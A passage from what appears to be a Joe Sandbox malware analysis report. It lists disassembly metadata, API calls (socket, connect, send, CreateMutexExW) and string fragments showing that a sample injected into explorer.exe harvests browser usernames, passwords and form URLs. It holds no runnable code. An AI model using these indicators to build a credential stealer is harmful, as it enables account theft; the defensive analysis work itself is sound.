                                                                                                                                                                          • ObtainUserAgentString.URLMON ref: 106929A0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AgentObtainStringUser
                                                                                                                                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                          • API String ID: 2681117516-319646191
                                                                                                                                                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                          • Instruction ID: 05bd0eb4e1d517d0d116c8edcae6496317746ad39d6801b18ddb9b5a20b6fa76
                                                                                                                                                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                          • Instruction Fuzzy Hash: 0631F231614A0D8FCB44EFA8C8857EEB7E0FF58204F40022AE85ED7240DF789649C799

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • ObtainUserAgentString.URLMON ref: 106929A0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AgentObtainStringUser
                                                                                                                                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                          • API String ID: 2681117516-319646191
                                                                                                                                                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                          • Instruction ID: f90d696c900fcd7ee0283e325c5bd3cc7ca47d920bd3277ad375e991670a740b
                                                                                                                                                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                          • Instruction Fuzzy Hash: C421E130A10A4D8FCB45EFA9C8957EEBBE0FF58204F40422AE45AD7240DF749605CB99

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 232 1068eb66-1068eb68 233 1068eb6a-1068eb6b 232->233 234 1068eb93-1068ebb8 232->234 236 1068eb6d-1068eb71 233->236 237 1068ebbe-1068ec22 call 10695612 call 10697942 * 2 233->237 235 1068ebbb-1068ebbc 234->235 235->237 236->235 238 1068eb73-1068eb92 236->238 246 1068ec28-1068ec2b 237->246 247 1068ecdc 237->247 238->234 246->247 248 1068ec31-1068ecb0 call 10699da4 call 10699022 call 106993e2 call 10699022 call 106993e2 246->248 249 1068ecde-1068ecf6 247->249 261 1068ecb5-1068ecca CreateMutexExW 248->261 262 1068ecce-1068ecd3 261->262 262->247 263 1068ecd5-1068ecda 262->263 263->249
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateMutex
                                                                                                                                                                          • String ID: .dll$el32$kern
                                                                                                                                                                          • API String ID: 1964310414-1222553051
                                                                                                                                                                          • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                          • Instruction ID: 5f7d0c849c58a3a663874ea5a4ce9295b0feede0ad2802c5beca7cac102ba5cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                          • Instruction Fuzzy Hash: 58414A74A18A088FDB84EFA8C8D9BED77E0FB58300F00417AD84EDB655DE349945CB95

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateMutex
                                                                                                                                                                          • String ID: .dll$el32$kern
                                                                                                                                                                          • API String ID: 1964310414-1222553051
                                                                                                                                                                          • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                          • Instruction ID: fa086b3c129154561ebf3f7551211afc5637a61c3dbd488cc24bb00cf17228a5
                                                                                                                                                                          • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A413774A18A088FDB84EFA8C899BED77E0FB68300F00417AD84EDB255DE349945CB95

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 293 1069472e-10694768 294 10694788-106947ab connect 293->294 295 1069476a-10694782 call 10697942 293->295 295->294
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: connect
                                                                                                                                                                          • String ID: conn$ect
                                                                                                                                                                          • API String ID: 1959786783-716201944
                                                                                                                                                                          • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                          • Instruction ID: 9076d29e0b712e02416a69a84d467a1180026f317df3154e36393b0ee1a19c32
                                                                                                                                                                          • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                          • Instruction Fuzzy Hash: E6014C30618B188FCB84EF5CE088B55B7E0FB59314F1645AAE90DCB226CA74D8818BC2

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 298 10694732-10694768 299 10694788-106947ab connect 298->299 300 1069476a-10694782 call 10697942 298->300 300->299
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: connect
                                                                                                                                                                          • String ID: conn$ect
                                                                                                                                                                          • API String ID: 1959786783-716201944
                                                                                                                                                                          • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                          • Instruction ID: 8efcdbe7f3c16705951ec1ab4a6de80fca4f5de660b878c068e42f3a949861b4
                                                                                                                                                                          • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                          • Instruction Fuzzy Hash: 27012C70618A1C8FCB84EF5CE088B55B7E0FB59314F1641AEE80DCB226CB74C9818BC2

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 411 106946b2-106946e5 412 10694705-1069472d send 411->412 413 106946e7-106946ff call 10697942 411->413 413->412
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: send
                                                                                                                                                                          • String ID: send
                                                                                                                                                                          • API String ID: 2809346765-2809346765
                                                                                                                                                                          • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                          • Instruction ID: 0b3d11645177ccba8be6825434119ec854e23c5ee0d9fa346e6aaa1d07d2b7d1
                                                                                                                                                                          • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                          • Instruction Fuzzy Hash: D6012570618A1C8FDBC8DF5CD049B1577E0FB58314F1645AED85DCB266CA70D881CB85

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 416 106945b2-106945ea 417 1069460a-1069462b socket 416->417 418 106945ec-10694604 call 10697942 416->418 418->417
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: socket
                                                                                                                                                                          • String ID: sock
                                                                                                                                                                          • API String ID: 98920635-2415254727
                                                                                                                                                                          • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                          • Instruction ID: 81323b46c89029417c4c1d82435af5fb3baea28e63657602a7175b9b3c6debd4
                                                                                                                                                                          • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                          • Instruction Fuzzy Hash: 68014F70618A1C8FCB84EF1CE048B54BBE0FB59354F1545AEE85ECB266C7B4C981CB86

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 421 1068c2dd-1068c320 call 10697942 424 1068c3fa-1068c40e 421->424 425 1068c326 421->425 426 1068c328-1068c339 SleepEx 425->426 426->426 427 1068c33b-1068c341 426->427 428 1068c34b-1068c352 427->428 429 1068c343-1068c349 427->429 431 1068c370-1068c376 428->431 432 1068c354-1068c35a 428->432 429->428 430 1068c35c-1068c36a call 10696f12 429->430 430->431 433 1068c378-1068c37e 431->433 434 1068c3b7-1068c3bd 431->434 432->430 432->431 433->434 436 1068c380-1068c38a 433->436 437 1068c3bf-1068c3cf call 1068ce72 434->437 438 1068c3d4-1068c3db 434->438 436->434 440 1068c38c-1068c3b1 call 1068d432 436->440 437->438 438->426 442 1068c3e1-1068c3f5 call 1068c0f2 438->442 440->434 442->426
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                          • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                          • Instruction ID: 1666b13f8df599cc2b5e4042590d5415b10d920057864343629b7bc06fdc5a45
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                          • Instruction Fuzzy Hash: 21316A74614B4DDFDB949F2980882D5B7A1FB59311F44827FC91DCA10ACB74A491CFE1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 457 1068c412-1068c446 call 10697942 460 1068c448-1068c472 call 10699c9e CreateThread 457->460 461 1068c473-1068c47d 457->461
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                          • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                          • Instruction ID: 6cba2b164e98a6525a70815e967cc7e6d8d58bfffc36adaa449c97a7b3788577
                                                                                                                                                                          • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                          • Instruction Fuzzy Hash: C0F0C234268A4D4FD788EB2CD84563AB3E0FBA9214F41463EA54DC3264DA39D5814716
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                                                          • API String ID: 0-393284711
                                                                                                                                                                          • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                          • Instruction ID: a7347054ffb6a7dbd5cde54cee66d8b2a18fdcd5b90c92692e1d8e229335f3c1
                                                                                                                                                                          • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                          • Instruction Fuzzy Hash: 81E16EB4618F488FC765DF68C4857AAB7E0FF58301F804A2EA59BCB245DF34A501CB55
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                                          • API String ID: 0-2916316912
                                                                                                                                                                          • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                          • Instruction ID: 6d7d0c5196f05ff9dac592e630e9722991f30bfe25533325d623ed16c20fa999
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                          • Instruction Fuzzy Hash: 3DB18D70518B488EDB69DF68C485AEEB7F1FF98300F50451EE49ACB251DF70A4058B95
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                                          • API String ID: 0-1539916866
                                                                                                                                                                          • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                          • Instruction ID: 7049d908588ca598a07f56c3e68e77383fdce10690a4735bc695fe13d99a6b0c
                                                                                                                                                                          • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                          • Instruction Fuzzy Hash: F541B170A18B088FDB14EF88A4467BD7BE2FB48708F40426EE409D3245DBB5AD45CBD6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                          • API String ID: 0-355182820
                                                                                                                                                                          • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                          • Instruction ID: 305aa5ab50d14253f1e136f11d275dee0d474f9c317f003eca520ab839b3b638
                                                                                                                                                                          • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                          • Instruction Fuzzy Hash: F7C16DB4618B098FC758EF28D48669AF3E1FB94305F40472EA49ACB250DF34B915CB96
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                                          • API String ID: 0-97273177
                                                                                                                                                                          • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                          • Instruction ID: cf3364c85969a5e42a388a92b9e5e472869e33d1d84b334011170df5f35ae665
                                                                                                                                                                          • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E51D67561C7488FD749CF18D4812AAB7E5FBC5701F501A2EE8CBCB245DBB4A906CB82
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                          • API String ID: 0-639201278
                                                                                                                                                                          • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                          • Instruction ID: 10f07ccaa00fc59276566c47b92f202ad9913e571fa1ac5d5ad4a30d61258221
                                                                                                                                                                          • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                          • Instruction Fuzzy Hash: B1C1A374618E198FC758EF68D496AAAF3E1FF98305F854329944ACB290DF30E901CBD5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                          • API String ID: 0-639201278
                                                                                                                                                                          • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                          • Instruction ID: 57eb02a6c2e5ae4d1fecfe0082d3c0480beecf93554098e8a64d2fc998bb7000
                                                                                                                                                                          • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                          • Instruction Fuzzy Hash: E6C1B474618E194FC758EF68D4966A9F3E1FF98305F854329944ACB290DF30E901CBD5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                          • API String ID: 0-2058692283
                                                                                                                                                                          • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                          • Instruction ID: b3ca080ed13e5c24a174421fb425e28c3331d0333591f03b334f8f04d9e5799a
                                                                                                                                                                          • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                          • Instruction Fuzzy Hash: A9A1BF70618B488BDB18DFA8D444BEEB7E1FF88305F40462DE48ADB291EF709945C789
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                          • API String ID: 0-2058692283
                                                                                                                                                                          • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                          • Instruction ID: 01c282773ea1b36bccd1a97105f02fa7b50e40b3ae7fdb0ab37cdd3beb646086
                                                                                                                                                                          • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                          • Instruction Fuzzy Hash: 52918E70618B488BDB18DFA8D444BEEB7E1FF88305F40462DE48ADB291EB7095458B85
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: $.$e$n$v
                                                                                                                                                                          • API String ID: 0-1849617553
                                                                                                                                                                          • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                          • Instruction ID: 4b03e7417a6c0125d9a4dd52cf5875b3d76f552c14c58a46eea2a9c601953fe7
                                                                                                                                                                          • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                          • Instruction Fuzzy Hash: 2371D071608B488FD758DFA8D4857AAB3F0FF98305F40063EE44ACB261EB71E9458B85
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                          • API String ID: 0-1970020201
                                                                                                                                                                          • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                          • Instruction ID: 73dffea2e585c37444e3bd4d21350027bf1b864288550c2c17e8e5691f44d0e9
                                                                                                                                                                          • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                          • Instruction Fuzzy Hash: A4516BB0918B4C8FDB54DFA4D045AEEB7F1FF18301F40462EA49AEB254EF30A5418B99
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 4$\$dll$ion.$vers
                                                                                                                                                                          • API String ID: 0-1610437797
                                                                                                                                                                          • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                          • Instruction ID: e16096aa72c67479ea2ec1883a791dfc2ef324b148f50e68c8f96fdf255cb2aa
                                                                                                                                                                          • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                          • Instruction Fuzzy Hash: E6418434228B4C8FCBA5DF24D8457EAB3E4FB98315F51462E989EC7240EF70E9058792
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                                          • API String ID: 0-327345718
                                                                                                                                                                          • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                          • Instruction ID: 52c21df8cbb5cdb47bd8c95d6388107c9843b4dc7d842ec43338e466c8464346
                                                                                                                                                                          • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                          • Instruction Fuzzy Hash: 20418C70A18E0D8FCB84EF6890953AD73E1FB59309F85416AA80EDB340DEB0D9408B86
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: .dll$el32$h$kern
                                                                                                                                                                          • API String ID: 0-4264704552
                                                                                                                                                                          • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                          • Instruction ID: c238c3444676ab6ad44889cc1fd65738e155fcd71c6e3d5fcb7df3f195be761b
                                                                                                                                                                          • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D41C170A08B4D8FD7A8DF2890843AAB7E1FBA8314F544A2F949EC7255DF70D945CB81
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
